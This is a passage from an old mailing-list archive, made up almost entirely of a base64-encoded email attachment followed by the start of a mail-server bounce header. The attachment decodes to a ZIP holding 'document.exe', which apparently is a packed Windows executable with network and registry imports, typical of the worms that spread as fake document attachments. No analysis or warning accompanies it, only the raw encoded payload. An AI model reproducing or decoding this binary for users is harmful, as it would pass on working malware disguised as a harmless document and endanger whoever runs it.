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
SwUGAAAAAAEAAQA6AAAAKlgAAAAA

------=_NextPart_000_0009_9E4E878A.916BABCC--




From MAILER-DAEMON  Mon Feb 16 17:54:56 2004
Return-Path: <>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from host10.root-name-server.net (host10.root-name-server.net [69.57.175.42])
	by master.modssl.org (Postfix) with ESMTP id 9296FA8978
	for ; Mon, 16 Feb 2004 17:54:43 +0100 (CET)
Received: from nobody by host10.root-name-server.net with local (Exim 4.24)
	id 1Asm12-00059q-7m
